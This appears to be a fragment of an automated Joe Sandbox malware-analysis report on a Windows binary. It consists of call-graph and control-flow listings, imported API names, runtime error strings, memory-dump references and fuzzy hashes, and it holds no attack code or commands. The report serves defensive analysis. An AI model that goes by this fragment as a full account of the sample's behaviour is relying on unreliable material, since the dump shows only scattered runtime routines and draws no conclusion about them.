7ff612d31394 2 API calls 3548->3550 3551 7ff612d31394 2 API calls 3549->3551 3550->3549 3552 7ff612d3153a 3551->3552 3553 7ff612d31394 2 API calls 3552->3553 3554 7ff612d3153f 3553->3554 3555 7ff612d31394 2 API calls 3554->3555 3556 7ff612d3154e 3555->3556 3557 7ff612d31394 2 API calls 3556->3557 3558 7ff612d3155d 3557->3558 3559 7ff612d31394 2 API calls 3558->3559 3560 7ff612d3156c 3559->3560 3561 7ff612d31394 2 API calls 3560->3561 3562 7ff612d3157b 3561->3562 3563 7ff612d31394 2 API calls 3562->3563 3564 7ff612d3158a 3563->3564 3565 7ff612d31394 2 API calls 3564->3565 3566 7ff612d31599 3565->3566 3567 7ff612d31394 2 API calls 3566->3567 3568 7ff612d315a8 3567->3568 3569 7ff612d31394 2 API calls 3568->3569 3570 7ff612d315b7 3569->3570 3571 7ff612d31394 2 API calls 3570->3571 3572 7ff612d315c6 3571->3572 3573 7ff612d31394 2 API calls 3572->3573 3574 7ff612d315d5 3573->3574 3575 7ff612d31394 2 API calls 3574->3575 3576 7ff612d315e4 3575->3576 3577 7ff612d31394 2 API calls 3576->3577 3578 7ff612d315f3 3577->3578 3579 7ff612d32104 3580 7ff612d32111 EnterCriticalSection 3579->3580 3584 7ff612d32218 3579->3584 3582 7ff612d3220b LeaveCriticalSection 3580->3582 3587 7ff612d3212e 3580->3587 3581 7ff612d32272 3582->3584 3583 7ff612d32241 DeleteCriticalSection 3583->3581 3584->3581 3584->3583 3586 7ff612d32230 free 3584->3586 3585 7ff612d3214d TlsGetValue GetLastError 3585->3587 3586->3583 3586->3586 3587->3582 3587->3585 3606 7ff612d31e65 3607 7ff612d31e67 signal 3606->3607 3608 7ff612d31e7c 3607->3608 3610 7ff612d31e99 3607->3610 3609 7ff612d31e82 signal 3608->3609 3608->3610 3609->3610 3623 7ff612d31ac3 3624 7ff612d31a70 3623->3624 3625 7ff612d31b36 3624->3625 3626 7ff612d3199e 3624->3626 3631 7ff612d31b5c 3624->3631 3627 7ff612d31ba0 4 API calls 3625->3627 3628 7ff612d31a0f 3626->3628 3630 7ff612d319e9 VirtualProtect 3626->3630 3629 7ff612d31b53 3627->3629 3630->3626 3632 7ff612d31f47 3633 7ff612d31e67 signal 3632->3633 3636 7ff612d31e99 3632->3636 3634 7ff612d31e7c 3633->3634 3633->3636 3635 7ff612d31e82 signal 3634->3635 3634->3636 3635->3636 3588 7ff612d31e10 3589 7ff612d31e2f 3588->3589 3590 7ff612d31eb5 3589->3590 3591 7ff612d31ecc 3589->3591 3594 7ff612d31e55 3589->3594 3591->3590 3592 7ff612d31ed3 signal 3591->3592 3592->3590 3593 7ff612d31ee4 3592->3593 3593->3590 3595 7ff612d31eea signal 3593->3595 3594->3590 3596 7ff612d31f12 signal 3594->3596 3595->3590 3596->3590 3611 7ff612d31a70 3612 7ff612d3199e 3611->3612 3613 7ff612d31a7d 3611->3613 3614 7ff612d31a0f 3612->3614 3615 7ff612d319e9 VirtualProtect 3612->3615 3613->3611 3616 7ff612d31b5c 3613->3616 3617 7ff612d31b36 3613->3617 3615->3612 3618 7ff612d31ba0 4 API calls 3617->3618 3619 7ff612d31b53 3618->3619 3637 7ff612d31fd0 3638 7ff612d31fe4 3637->3638 3640 7ff612d32033 3637->3640 3639 7ff612d31ffd EnterCriticalSection LeaveCriticalSection 3638->3639 3638->3640 3639->3640 3641 7ff612d32050 3642 7ff612d3205e EnterCriticalSection 3641->3642 3643 7ff612d320cf 3641->3643 3644 7ff612d320c2 LeaveCriticalSection 3642->3644 3645 7ff612d32079 3642->3645 3644->3643 3645->3644 3646 7ff612d320bd free 3645->3646 3646->3644 3620 7ff612d3216f 3621 7ff612d32178 InitializeCriticalSection 3620->3621 3622 7ff612d32185 3620->3622 3621->3622 3474 7ff612d31394 3475 7ff612d36e80 malloc 3474->3475 3476 7ff612d313b8 3475->3476 3477 7ff612d313c6 NtWaitForWorkViaWorkerFactory 3476->3477 3486 7ff612d31ab3 3487 7ff612d31a70 3486->3487 3487->3486 3488 7ff612d31b36 3487->3488 3492 7ff612d3199e 3487->3492 3494 7ff612d31b5c 3487->3494 3489 7ff612d31ba0 4 API calls 3488->3489 3491 7ff612d31b53 3489->3491 3490 7ff612d31a0f 3492->3490 3493 7ff612d319e9 VirtualProtect 3492->3493 3493->3492

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00007FF612D32320 1 Function_00007FF612D32420 2 Function_00007FF612D36B20 3 Function_00007FF612D33821 4 Function_00007FF612D31422 86 Function_00007FF612D31394 4->86 5 Function_00007FF612D37130 104 Function_00007FF612D36E70 5->104 6 Function_00007FF612D31530 6->86 7 Function_00007FF612D33B30 7->6 21 Function_00007FF612D31503 7->21 35 Function_00007FF612D363F0 7->35 36 Function_00007FF612D32DF0 7->36 40 Function_00007FF612D338C0 7->40 42 Function_00007FF612D365C0 7->42 44 Function_00007FF612D316C0 7->44 47 Function_00007FF612D314C7 7->47 61 Function_00007FF612D315A8 7->61 62 Function_00007FF612D314A9 7->62 64 Function_00007FF612D369B0 7->64 72 Function_00007FF612D3157B 7->72 75 Function_00007FF612D36880 7->75 79 Function_00007FF612D36790 7->79 89 Function_00007FF612D32660 7->89 96 Function_00007FF612D3145E 7->96 98 Function_00007FF612D3156C 7->98 99 Function_00007FF612D3146D 7->99 101 Function_00007FF612D36C70 7->101 103 Function_00007FF612D31370 7->103 7->104 105 Function_00007FF612D32F70 7->105 109 Function_00007FF612D31440 7->109 112 Function_00007FF612D36B40 7->112 114 Function_00007FF612D3153F 7->114 118 Function_00007FF612D33350 7->118 8 Function_00007FF612D31431 8->86 9 Function_00007FF612D33331 10 Function_00007FF612D36731 11 Function_00007FF612D36C31 12 Function_00007FF612D36E31 13 Function_00007FF612D31000 15 Function_00007FF612D31E00 13->15 41 Function_00007FF612D31FC0 13->41 65 Function_00007FF612D31FB0 13->65 117 Function_00007FF612D31750 13->117 14 Function_00007FF612D33800 16 Function_00007FF612D31800 82 Function_00007FF612D32290 16->82 17 Function_00007FF612D32500 18 Function_00007FF612D36E01 19 Function_00007FF612D31404 19->86 20 Function_00007FF612D32104 21->86 22 Function_00007FF612D31E10 23 Function_00007FF612D36711 24 Function_00007FF612D36C11 25 Function_00007FF612D31512 25->86 26 Function_00007FF612D320E0 27 Function_00007FF612D331E0 27->103 28 Function_00007FF612D317E0 28->26 29 Function_00007FF612D322E0 30 Function_00007FF612D32DE0 31 Function_00007FF612D337E0 32 Function_00007FF612D31AE4 56 Function_00007FF612D31BA0 32->56 111 Function_00007FF612D31D40 32->111 33 Function_00007FF612D314E5 33->86 34 Function_00007FF612D310F0 36->25 80 Function_00007FF612D32690 36->80 36->89 36->96 37 Function_00007FF612D36AF1 38 Function_00007FF612D314F4 38->86 39 Function_00007FF612D314B8 39->86 40->39 46 Function_00007FF612D315C6 40->46 54 Function_00007FF612D315D5 40->54 55 Function_00007FF612D3149A 40->55 40->62 71 Function_00007FF612D3147C 40->71 78 Function_00007FF612D3148B 40->78 40->80 40->96 43 Function_00007FF612D32DC0 45 Function_00007FF612D31AC3 45->56 45->111 46->86 47->86 48 Function_00007FF612D324D0 49 Function_00007FF612D317D0 50 Function_00007FF612D31FD0 51 Function_00007FF612D363D1 52 Function_00007FF612D366D1 53 Function_00007FF612D31AD4 53->56 53->111 54->86 55->86 56->48 63 Function_00007FF612D323B0 56->63 56->111 57 Function_00007FF612D31FA0 58 Function_00007FF612D338A0 59 Function_00007FF612D32DA1 60 Function_00007FF612D3219E 61->86 62->86 66 Function_00007FF612D322B0 67 Function_00007FF612D363B1 68 Function_00007FF612D365B1 69 Function_00007FF612D366B1 70 Function_00007FF612D31AB3 70->56 70->111 71->86 72->86 73 Function_00007FF612D31880 73->1 73->56 73->89 73->111 74 Function_00007FF612D36E80 74->104 76 Function_00007FF612D33880 77 Function_00007FF612D36381 78->86 80->21 80->33 80->38 80->47 80->62 88 Function_00007FF612D3155D 80->88 80->96 80->103 80->104 81 Function_00007FF612D31F90 83 Function_00007FF612D32590 84 Function_00007FF612D36990 85 Function_00007FF612D36591 86->5 86->74 87 Function_00007FF612D32194 102 Function_00007FF612D31870 87->102 88->86 90 Function_00007FF612D32460 91 Function_00007FF612D31160 91->7 91->44 91->73 91->81 91->91 91->102 92 Function_00007FF612D31760 92->26 93 Function_00007FF612D33861 94 Function_00007FF612D36361 95 Function_00007FF612D36861 96->86 97 Function_00007FF612D31E65 97->102 98->86 99->86 100 Function_00007FF612D31A70 100->56 100->111 105->27 105->62 106 Function_00007FF612D36571 107 Function_00007FF612D36971 108 Function_00007FF612D3216F 109->86 110 Function_00007FF612D31140 110->91 111->82 113 Function_00007FF612D36341 114->86 115 Function_00007FF612D31F47 115->102 116 Function_00007FF612D31650 118->4 118->8 118->96 118->103 119 Function_00007FF612D32050 120 Function_00007FF612D36E50 121 Function_00007FF612D36551 122 Function_00007FF612D36C51

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
                                                                  • Instruction ID: f4f1eec81117c3c31074e685518e7588530ba6bbc1351d4cc788973a8c371bea
                                                                  • Opcode Fuzzy Hash: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
                                                                  • Instruction Fuzzy Hash: 065127A5E49E4F85FA10DB25E9513BA23A1BF48FA8F148231C94DC73A1DEBCE441C720

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtWaitForWorkViaWorkerFactory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF612D31156), ref: 00007FF612D313F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: FactoryWaitWorkWorker
                                                                  • String ID:
                                                                  • API String ID: 1653044593-0
                                                                  • Opcode ID: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
                                                                  • Instruction ID: 6ff5bd75b96a944a9fa12996f09ce9c3cd2b4c468f489fdc13fbfc74faac9db7
                                                                  • Opcode Fuzzy Hash: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
                                                                  • Instruction Fuzzy Hash: 6FF0ECB6E0CF4586E610CF51F84006A77A1FB58B98B105635E98C83729CF7CE050CB61
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                                  • String ID:
                                                                  • API String ID: 3604702941-3916222277
                                                                  • Opcode ID: b6f3575da4a60cebb35c731804f48eea7ac295aa7edbb5adab30900fd57ac75a
                                                                  • Instruction ID: 146b4b4052a4ccb43b08f1b2829981f9f1a1c5979c8e56fd545676cba61d65a3
                                                                  • Opcode Fuzzy Hash: b6f3575da4a60cebb35c731804f48eea7ac295aa7edbb5adab30900fd57ac75a
                                                                  • Instruction Fuzzy Hash: 46334AA1D6CECA88F711CB29E8412F56360BF95BACF449331D98CD25A1EFECA244C354

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscatwcscpywcslen
                                                                  • String ID: $0$0$@$@
                                                                  • API String ID: 4263182637-1413854666
                                                                  • Opcode ID: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
                                                                  • Instruction ID: 9a9801b0721a84dd4a0d0c00a36713d0778a9ffe67c4d151fd0b671eca346fac
                                                                  • Opcode Fuzzy Hash: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
                                                                  • Instruction Fuzzy Hash: EDB18E62D1CECA85F761CB14E4057AB77A0FB80B6CF104235EA8887AA5DFBDE145CB50

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                  • String ID: 0$X$`
                                                                  • API String ID: 329590056-2527496196
                                                                  • Opcode ID: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
                                                                  • Instruction ID: eef5796352d7dce7996ac8c305d85e5242eb076a4bf45e0e68e87db36b71999d
                                                                  • Opcode Fuzzy Hash: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
                                                                  • Instruction Fuzzy Hash: 3B027E62A08FCA85E720CB15E8447AA77A4FB85BA8F104335DA9C877E5DFBCD145C710

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31CC7
                                                                  • memcpy.MSVCRT ref: 00007FF612D31CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF612D391C0,00007FF612D391C0,?,?,00007FF612D30000,?,00007FF612D31991), ref: 00007FF612D31D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
                                                                  • Instruction ID: 86b2dd7e357605be484cbf01d11c49d622f83611e8e6aeec1b014bc24a6e551d
                                                                  • Opcode Fuzzy Hash: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
                                                                  • Instruction Fuzzy Hash: 604160A1E09E4B85EA10CB66E8446B967B0FB45FE8F554232CE0DC77A1DEBCE545C320

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
                                                                  • Instruction ID: 10bad2e3b345b0ebe0d415e210ed6bba9e356372f413cfecef8495389efcb911
                                                                  • Opcode Fuzzy Hash: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
                                                                  • Instruction Fuzzy Hash: CF21E7A5E49D0A85FA19CB11E9483752260BF01FBCF658631CD1EC7AA4DFACBC46C320

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 549 7ff612d31e10-7ff612d31e2d 550 7ff612d31e3e-7ff612d31e48 549->550 551 7ff612d31e2f-7ff612d31e38 549->551 553 7ff612d31e4a-7ff612d31e53 550->553 554 7ff612d31ea3-7ff612d31ea8 550->554 551->550 552 7ff612d31f60-7ff612d31f69 551->552 556 7ff612d31ecc-7ff612d31ed1 553->556 557 7ff612d31e55-7ff612d31e60 553->557 554->552 555 7ff612d31eae-7ff612d31eb3 554->555 558 7ff612d31efb-7ff612d31f0a call 7ff612d37420 555->558 559 7ff612d31eb5-7ff612d31eba 555->559 560 7ff612d31f23-7ff612d31f2d 556->560 561 7ff612d31ed3-7ff612d31ee2 signal 556->561 557->554 558->560 571 7ff612d31f0c-7ff612d31f10 558->571 559->552 562 7ff612d31ec0 559->562 565 7ff612d31f2f-7ff612d31f3f 560->565 566 7ff612d31f43-7ff612d31f45 560->566 561->560 563 7ff612d31ee4-7ff612d31ee8 561->563 562->560 567 7ff612d31eea-7ff612d31ef9 signal 563->567 568 7ff612d31f4e-7ff612d31f53 563->568 565->566 566->552 567->552 570 7ff612d31f5a 568->570 570->552 572 7ff612d31f55 571->572 573 7ff612d31f12-7ff612d31f21 signal 571->573 572->570 573->552
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
                                                                  • Instruction ID: 6b906e74bd541b1d5ac6e5096382a324d135e355de52ab9fddb503773fc0a67f
                                                                  • Opcode Fuzzy Hash: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
                                                                  • Instruction Fuzzy Hash: 1B2148A6E0CD0F42FA698264D59037912A1BF84FBCF258731D90DC32D4DEACE8828260

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 574 7ff612d31880-7ff612d3189c 575 7ff612d31a0f-7ff612d31a1f 574->575 576 7ff612d318a2-7ff612d318f9 call 7ff612d32420 call 7ff612d32660 574->576 576->575 581 7ff612d318ff-7ff612d31910 576->581 582 7ff612d3193e-7ff612d31941 581->582 583 7ff612d31912-7ff612d3191c 581->583 584 7ff612d3194d-7ff612d31954 582->584 585 7ff612d31943-7ff612d31947 582->585 583->584 586 7ff612d3191e-7ff612d31929 583->586 588 7ff612d31956-7ff612d31961 584->588 589 7ff612d3199e-7ff612d319a6 584->589 585->584 587 7ff612d31a20-7ff612d31a26 585->587 586->584 590 7ff612d3192b-7ff612d3193a 586->590 593 7ff612d31b87-7ff612d31b98 call 7ff612d31d40 587->593 594 7ff612d31a2c-7ff612d31a37 587->594 591 7ff612d31970-7ff612d3199c call 7ff612d31ba0 588->591 589->575 592 7ff612d319a8-7ff612d319c1 589->592 590->582 591->589 596 7ff612d319df-7ff612d319e7 592->596 594->589 598 7ff612d31a3d-7ff612d31a5f 594->598 601 7ff612d319e9-7ff612d31a0d VirtualProtect 596->601 602 7ff612d319d0-7ff612d319dd 596->602 599 7ff612d31a7d-7ff612d31a97 598->599 604 7ff612d31a9d-7ff612d31afa 599->604 605 7ff612d31b74-7ff612d31b82 call 7ff612d31d40 599->605 601->602 602->575 602->596 610 7ff612d31afc-7ff612d31b0e 604->610 611 7ff612d31b22-7ff612d31b26 604->611 605->593 612 7ff612d31b5c-7ff612d31b6f call 7ff612d31d40 610->612 613 7ff612d31b10-7ff612d31b20 610->613 614 7ff612d31b2c-7ff612d31b30 611->614 615 7ff612d31a70-7ff612d31a77 611->615 612->605 613->611 613->612 614->615 616 7ff612d31b36-7ff612d31b53 call 7ff612d31ba0 614->616 615->589 615->599 620 7ff612d31b57 616->620 620->620
                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF612D31247), ref: 00007FF612D319F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2016780093.00007FF612D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF612D30000, based on PE: true
                                                                  • Associated: 00000000.00000002.2016764607.00007FF612D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016794759.00007FF612D38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016831988.00007FF612D3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2016845692.00007FF612D3B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017041322.00007FF612FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017059628.00007FF612FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2017078574.00007FF612FB6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ff612d30000_LfHJdrALlh.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
                                                                  • Instruction ID: f6bb1fd4fc95812575bd383a28d8dcd52cda6107a216f89a6028d909742b004a
                                                                  • Opcode Fuzzy Hash: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
                                                                  • Instruction Fuzzy Hash: 3B513CA5E08D4AD6EB10CB25E8417B92761FB14FBCF548231D91C87794CEBCE596C720

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
